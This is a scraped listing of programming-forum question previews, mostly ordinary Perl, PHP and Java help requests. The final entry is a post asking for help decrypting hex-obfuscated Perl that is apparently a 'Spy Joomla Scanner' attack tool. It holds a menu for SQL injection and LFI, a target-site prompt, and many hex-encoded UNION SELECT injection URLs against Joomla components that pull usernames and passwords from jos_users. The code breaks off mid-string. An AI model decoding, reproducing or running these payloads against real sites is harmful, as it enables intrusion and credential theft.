2,452 Topics

Member Avatar for
Member Avatar for fredfletcher

Hello, I've searched far and wide for an answer to a question that I have, but did not find anything that could help me achieve what I would like to do. I have a delimited text file (CSV) with fields that resemble these below that repeats/resemble 18 times (I only …

Member Avatar for fredfletcher
0
129
Member Avatar for glut

Hello. I have a severe problem with open(). Here is my actual code. [ICODE] #!/usr/bin/perl $file = '/testerpage.php'; # Name the file open(INFO, $file); # Open the file @lines = <INFO>; # Read it into an array close(INFO); # Close the file print @lines; # Print the array <>; [/ICODE] …

Member Avatar for glut
0
167
Member Avatar for master-tech

OK.. so this is probably basic but, I can't seem to wrap my head around it. The URL is like this.. [url]http://Whatever.com?id=ThisID&title=AncorText[/url] So.. I'm trying to use.. [CODE]<?php $id = $_GET['id']; $title = $_GET['title']; echo $id; echo $title; ?>[/CODE] .. to place the variable parameters into a hyperlinked URL on …

Member Avatar for master-tech
0
227
Member Avatar for anilgupte

I have a problem with MDI forms and their location. I have a container form within which I open several child forms. Also note that in the container form I have a ToolStrip at the top and it is also docked to the top. In each of the child forms …

0
80
Member Avatar for parulchahar@yah

Hi, I want to use the macro "ITIMER_REAL" in my perl script. But using this is giving me error as "Your vendor has not defined Time::HiRes macro ITIMER_REAL, used at test.pl line 15." Can anyone help me out in finding the reason. Thanks, Parul

Member Avatar for rch1231
0
57
Member Avatar for Dani

I am using Mac OS X with the built in configuration of Apache. I am taking a web dev class where we're writing perl scripts ... so far I've been able to get my CGI scripts to run via mod_perl. Now, I'm trying to install CGI::Session via CPAN and it's …

Member Avatar for thomasgutierrez
0
348
Member Avatar for skips

I'm just learning PERL. I'm working on a short practice data set. All I want to do is to see if A) all values from a list exist in a hash i've made from a separate data file, and B) are the values that do exist defined--i.e. have a value …

Member Avatar for skips
0
137
Member Avatar for winecoding

I have the following hashed structure [CODE]$chainStorage{$R1}{$S1}{$C1}{@A1}[/CODE] [QUOTE]$chainStorage = { 'ACB' => { 'E' => '06' => [100, 200, 95] 'B' => '23' => [20, 1000, 05, 30] }, 'AFG' => { 'C' => '24' => [18, 23, 2300, 3456] }, 'HJK' => { 'A' => '12' => [24, 25, …

Member Avatar for d5e5
0
452
Member Avatar for SubzeroX6

Hi, I've been trying to learn how to do collision between a sprite and a tile for a while, so I've been testing this point collision I found from a Java book. But for some reason, the tile's images can't be drawn onto the screen. Any Ideas or thoughts to …

Member Avatar for NormR1
0
330
Member Avatar for GreaseJunkie

Hi everyone, thanks for reading this. I am trying to write some code so that a vote button won't allow a person to vote unless they are registered and logged in. I have this written, but it's not outputting properly. I'm pretty sure I am not encoding the URLS properly …

Member Avatar for GreaseJunkie
0
4K
Member Avatar for dozierc

Hey guys I'm stuck. I have been trying to write a sed or perl script to change the below. But each time I run the sed script or perl it completely zeros out the file. I want to change this [B]/opt/dragon/bin/runit[/B] to this [B]cd /opt/dragon/bin; /opt/dragon/bin/runit[/B] #!/bin/bash for fl in …

Member Avatar for rch1231
0
145
Member Avatar for aldm

Hi, I have a weird problem in my asp.net project. On search page I have repeater. Inside repeater I have a link for reservation for each item. When I come on page first time, it works well. But when I change some of options in repeaters's data source - for …

Member Avatar for hericles
0
197
Member Avatar for ssdeep

i have a file of the form [CODE](9430, 3656) (9147, 14355) (133, 14393) (7917, 9513) (3719, 12775)[/CODE] lets say i need to store it as a hash.such that 9430=>3656 and so on.I tried using split but it takes whitespaces for right hand values.How can i do it the better way?

Member Avatar for d5e5
0
229
Member Avatar for ssdeep

I have a hash %d,i want the top five valued keys.I did the following wich worked but is there anything more effecient? [ICODE]@p=(reverse sort{$d{$a}<=>$d{$b}} keys%d)[0..4];[/ICODE]

Member Avatar for ssdeep
1
212
Member Avatar for sandeepau

Can someone help me on perl script for "how to sort flat file on third field & stored sorted output in the output flat file"? In this example - I have input file with unique key column (third field)& I want sorted output get stored in the output file. e.g. …

Member Avatar for sandeepau
0
868
Member Avatar for axn

for multiple scroll_list I used code below. [CODE]print scrolling_list(-name=>'services', -values=>\@field3, -multiple=>'true', -size=>25);[/CODE] How can I fix for a maximum of 3 selects since I have more than 50 scrolls.

0
83
Member Avatar for deni_bg

Hello people! I have a question. I use windows xp operating system and ms office professional 2007. When I want to import a tif file in Excel 2007 as a hyperlink from Hyperlink button, I succed import the tif file, but when I double click on the link it occurs …

Member Avatar for rubberman
0
272
Member Avatar for jcAmats

hi! can someone help debug my codes? getline() works properly in my main() but if i'm putting it to another function, it ignores the first getline() w/o entering any words and goes to the 2nd getline. my program works like this: i have a menu() that lets the user to …

Member Avatar for jcAmats
0
385
Member Avatar for roja12345

Hi Perl guru's I'm new on Perl i need help for below mentioned issue. I have 4 flat files with 4 columns like below: eg: 000360112720C17506721111130602 m 1L 1008968860482 I have one excel file with 12 columns I have converted the excel file into text with comma seperated. Now i …

0
86
Member Avatar for sandeepau

Hello, Can you please help me in following scenario in Perl scripting? I want to compare two text files & save output of this comparision in third file with flags I-Insert, D-Delete, U-Update at the end of line. File1.txt - 1|abc 2|efg 3|xyz File2.txt 1|abc 2|efh 4|pqr Expected output is …

Member Avatar for sandeepau
0
4K
Member Avatar for ssdeep

how do i read input from a file into a 2D array, the file is in the format.. 5 6 101010 101010 101010 101010 101010 where 5 denotes 5 rows and 6 denotes 6 columns.I need to read it all into a 2D array but With one major requirement the …

Member Avatar for Dandello
0
180
Member Avatar for sarabb

HI I have this perl need to be decrypted. any one help? with thanks [CODE]#!/usr/bin/perl use LWP::UserAgent;system("\x63\x6f\x6c\x6f\x72\x20\x61");system("\x63\x6c\x73");print "\x0a\x20\x20\x7c\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x7c\x0a";print "\x20\x20\x7c\x53\x70\x79\x20\x4a\x6f\x6f\x6d\x6c\x61\x20\x53\x63\x61\x6e\x6e\x65\x72\x20\x57\x69\x6e\x33\x32\x7c\x0a";print "\x20\x20\x7c\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x7c\x0a\x0a\x0a\x0a";print "\x5b\x2a\x5d\x20\x43\x72\x65\x61\x74\x65\x64\x20\x42\x79\x20\x53\x70\x79\x62\x6f\x79\x0a";print "\x5b\x2a\x5d\x45\x6d\x61\x69\x6c\x3a\x62\x30\x30\x6f\x40\x77\x69\x6e\x64\x6f\x77\x73\x6c\x69\x76\x65\x2e\x63\x6f\x6d\x0a\x0a\x0a";print "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x4f\x70\x74\x69\x6f\x6e\x73\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0a\x0a";print "\x5b\x2b\x5d\x31\x2d\x20\x53\x51\x4c\x20\x49\x6e\x6a\x65\x63\x74\x69\x6f\x6e\x0a\x5b\x2b\x5d\x32\x2d\x20\x4c\x46\x49\x0a";print "\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0a";print "\x0a\x5b\x2b\x5d\x20\x50\x75\x74\x20\x59\x6f\x75\x72\x20\x43\x68\x6f\x69\x63\x65\x20\x48\x65\x72\x65\x3a";$OO=<>;chomp $OO;if($OO==1){print "\x0a\x59\x6f\x75\x72\x20\x43\x68\x6f\x69\x63\x65\x20\x57\x61\x73\x20\x53\x51\x4c\x20\x49\x6e\x6a\x65\x63\x74\x69\x6f\x6e\x0a\x0a\x0a\x0a";print "\x5b\x2b\x5d\x20\x50\x75\x74\x20\x59\x6f\x75\x72\x20\x54\x61\x72\x67\x65\x74\x20\x57\x65\x62\x73\x69\x74\x65\x20\x48\x65\x72\x65\x20\x3a";$OOOO=<>;chomp $OOOO;@OOO=("\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x61\x6c\x61\x6d\x65\x64\x61\x26\x63\x6f\x6e\x74\x72\x6f\x6c\x6c\x65\x72\x3d\x63\x6f\x6d\x6d\x65\x6e\x74\x73\x26\x74\x61\x73\x6b\x3d\x65\x64\x69\x74\x26\x73\x74\x6f\x72\x65\x69\x64\x3d\x2d\x31\x2b\x75\x6e\x69\x6f\x6e\x2b\x61\x6c\x6c\x2b\x73\x65\x6c\x65\x63\x74\x2b\x63\x6f\x6e\x63\x61\x74\x28\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x29\x2b\x66\x72\x6f\x6d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x62\x32\x70\x6f\x72\x74\x66\x6f\x6c\x69\x6f\x26\x63\x3d\x2d\x31\x20\x55\x4e\x49\x4f\x4e\x20\x53\x45\x4c\x45\x43\x54\x20\x31\x2c\x63\x6f\x6e\x63\x61\x74\x28\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x29\x2c\x33\x2c\x34\x2c\x35\x20\x46\x52\x4f\x4d\x20\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x71\x75\x65\x73\x74\x69\x6f\x6e\x26\x63\x61\x74\x49\x44\x3d\x32\x31\x5c\x27\x20\x61\x6e\x64\x2b\x31\x3d\x30\x20\x75\x6e\x69\x6f\x6e\x20\x61\x6c\x6c\x20\x73\x65\x6c\x65\x63\x74\x20\x31\x2c\x32\x2c\x33\x2c\x34\x2c\x35\x2c\x36\x2c\x63\x6f\x6e\x63\x61\x74\x28\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x29\x2c\x38\x2c\x39\x20\x66\x72\x6f\x6d\x20\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2d\x2d\x25\x32\x30","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x4e\x6f\x47\x65\x26\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x65\x73\x65\x61\x72\x63\x68\x26\x73\x65\x61\x72\x63\x68\x49\x64\x3d\x2d\x31\x2b\x75\x6e\x69\x6f\x6e\x2b\x73\x65\x6c\x65\x63\x74\x2b\x31\x2c\x67\x72\x6f\x75\x70\x5f\x63\x6f\x6e\x63\x61\x74\x28\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x29\x2c\x33\x2c\x34\x2c\x35\x2c\x36\x2c\x37\x2c\x38\x2c\x39\x2c\x31\x30\x2c\x31\x31\x2c\x31\x32\x2c\x31\x33\x2c\x31\x34\x2b\x66\x72\x6f\x6d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x74\x69\x6d\x65\x72\x65\x74\x75\x72\x6e\x73\x26\x76\x69\x65\x77\x3d\x74\x69\x6d\x65\x72\x65\x74\x75\x72\x6e\x73\x26\x69\x64\x3d\x2d\x37\x2b\x75\x6e\x69\x6f\x6e\x2b\x61\x6c\x6c\x2b\x73\x65\x6c\x65\x63\x74\x2b\x63\x6f\x6e\x63\x61\x74\x28\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x29\x2c\x32\x2c\x33\x2c\x34\x2c\x35\x2c\x36\x2b\x66\x72\x6f\x6d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x74\x69\x6d\x65\x72\x65\x74\x75\x72\x6e\x73\x26\x76\x69\x65\x77\x3d\x74\x69\x6d\x65\x72\x65\x74\x75\x72\x6e\x73\x26\x69\x64\x3d\x37\x20\x41\x4e\x44\x20\x31\x3d\x32\x20\x55\x4e\x49\x4f\x4e\x20\x53\x45\x4c\x45\x43\x54\x20\x31\x2c\x32\x2c\x33\x2c\x34\x2c\x35\x2c\x36\x2c\x37\x2c\x38\x2c\x63\x6f\x6e\x63\x61\x74\x28\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x29\x2c\x31\x30\x2c\x31\x31\x2c\x31\x32\x2c\x31\x33\x2c\x31\x34\x2c\x31\x35\x2c\x31\x36\x2c\x31\x37\x2c\x31\x38\x2c\x31\x39\x2c\x32\x30\x2c\x32\x31\x2c\x32\x32\x2c\x32\x33\x20\x66\x72\x6f\x6d\x20\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x74\x65\x63\x68\x66\x6f\x6c\x69\x6f\x26\x76\x69\x65\x77\x3d\x74\x65\x63\x68\x66\x6f\x6c\x69\x6f\x64\x65\x74\x61\x69\x6c\x26\x63\x61\x74\x69\x64\x3d\x2d\x31\x20\x75\x6e\x69\x6f\x6e\x20\x73\x65\x6c\x65\x63\x74\x20\x31\x2c\x32\x2c\x63\x6f\x6e\x63\x61\x74\x28\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x29\x2c\x34\x2c\x35\x2c\x36\x2c\x37\x20\x66\x72\x6f\x6d\x20\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x68\x6d\x63\x6f\x6d\x6d\x75\x6e\x69\x74\x79\x26\x76\x69\x65\x77\x3d\x66\x6e\x64\x5f\x68\x6f\x6d\x65\x26\x69\x64\x3d\x31\x35\x35\x20\x61\x6e\x64\x20\x31\x3d\x32\x20\x75\x6e\x69\x6f\x6e\x20\x73\x65\x6c\x65\x63\x74\x20\x31\x2c\x32\x2c\x63\x6f\x6e\x63\x61\x74\x28\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x29\x2c\x34\x2c\x35\x2c\x36\x2c\x37\x2c\x38\x2c\x39\x2c\x31\x30\x2c\x31\x31\x2c\x31\x32\x2c\x31\x33\x2c\x31\x34\x2c\x31\x35\x20\x66\x72\x6f\x6d\x20\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x6c\x69\x73\x74\x69\x6e\x67\x26\x74\x61\x73\x6b\x3d\x62\x72\x6f\x77\x73\x65\x26\x63\x61\x74\x65\x67\x6f\x72\x79\x5f\x69\x64\x3d\x2d\x31\x2b\x75\x6e\x69\x6f\x6e\x2b\x73\x65\x6c\x65\x63\x74\x2b\x31\x2c\x32\x2c\x63\x6f\x6e\x63\x61\x74\x28\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x29\x2c\x34\x2b\x66\x72\x6f\x6d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x70\x65\x6f\x70\x6c\x65\x26\x63\x6f\x6e\x74\x72\x6f\x6c\x6c\x65\x72\x3d\x70\x65\x6f\x70\x6c\x65\x26\x74\x61\x73\x6b\x3d\x64\x65\x74\x61\x69\x6c\x73\x26\x69\x64\x3d\x2d\x31\x20\x55\x4e\x49\x4f\x4e\x20\x53\x45\x4c\x45\x43\x54\x20\x31\x2c\x63\x6f\x6e\x63\x61\x74\x28\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x29\x2c\x33\x20\x46\x52\x4f\x4d\x20\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x26\x74\x61\x73\x6b\x3d\x62\x6c\x6f\x67\x63\x61\x74\x65\x67\x6f\x72\x79\x26\x69\x64\x3d\x36\x30\x26\x49\x74\x65\x6d\x69\x64\x3d\x39\x39\x39\x39\x39\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x31\x2c\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2c\x33\x2c\x34\x2c\x35\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x64\x69\x72\x66\x72\x6d\x26\x74\x61\x73\x6b\x3d\x6c\x69\x73\x74\x41\x6c\x6c\x26\x63\x61\x74\x69\x64\x3d\x2d\x34\x2b\x75\x6e\x69\x6f\x6e\x2b\x73\x65\x6c\x65\x63\x74\x2b\x31\x2c\x32\x2c\x63\x6f\x6e\x63\x61\x74\x28\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x29\x2c\x34\x2c\x35\x2c\x36\x2c\x37\x2c\x38\x2c\x39\x2c\x31\x30\x2c\x31\x31\x2c\x31\x32\x2c\x31\x33\x2c\x31\x34\x2c\x31\x35\x2c\x31\x36\x2c\x31\x37\x2c\x31\x38\x2c\x31\x39\x2c\x32\x30\x2c\x32\x31\x2c\x32\x32\x2c\x32\x33\x2b\x66\x72\x6f\x6d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x6d\x61\x69\x6c\x74\x6f\x26\x74\x6d\x70\x6c\x3d\x6d\x61\x69\x6c\x74\x6f\x26\x61\x72\x74\x69\x63\x6c\x65\x3d\x35\x35\x30\x35\x31\x33\x2b\x61\x6e\x64\x2b\x31\x3d\x32\x2b\x75\x6e\x69\x6f\x6e\x2b\x73\x65\x6c\x65\x63\x74\x2b\x63\x6f\x6e\x63\x61\x74\x28\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x29\x2b\x66\x72\x6f\x6d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d\x26\x49\x74\x65\x6d\x69\x64\x3d\x31","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x6d\x61\x72\x6b\x65\x74\x70\x6c\x61\x63\x65\x26\x70\x61\x67\x65\x3d\x73\x68\x6f\x77\x5f\x63\x61\x74\x65\x67\x6f\x72\x79\x26\x63\x61\x74\x69\x64\x3d\x2d\x31\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2c\x32\x2c\x33\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x6e\x65\x6f\x72\x65\x66\x65\x72\x65\x6e\x63\x65\x73\x26\x49\x74\x65\x6d\x69\x64\x3d\x32\x37\x26\x63\x61\x74\x69\x64\x3d\x39\x39\x38\x38\x37\x37\x36\x36\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x5f\x69\x64\x3d\x31\x3d\x31\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x71\x75\x69\x7a\x26\x74\x61\x73\x6b\x3d\x75\x73\x65\x72\x5f\x74\x73\x74\x5f\x73\x68\x77\x26\x49\x74\x65\x6d\x69\x64\x3d\x36\x31\x26\x74\x69\x64\x3d\x31\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x30\x2c\x31\x2c\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x6d\x63\x71\x75\x69\x7a\x26\x74\x61\x73\x6b\x3d\x75\x73\x65\x72\x5f\x74\x73\x74\x5f\x73\x68\x77\x26\x49\x74\x65\x6d\x69\x64\x3d\x34\x32\x26\x74\x69\x64\x3d\x31\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x31\x2c\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x78\x66\x61\x71\x26\x74\x61\x73\x6b\x3d\x61\x6e\x73\x77\x65\x72\x26\x49\x74\x65\x6d\x69\x64\x3d\x32\x37\x26\x63\x61\x74\x69\x64\x3d\x39\x37\x26\x61\x69\x64\x3d\x2d\x39\x39\x38\x38\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x30\x2c\x30\x2c\x30\x2c\x30\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x30\x2c\x30\x2c\x30\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x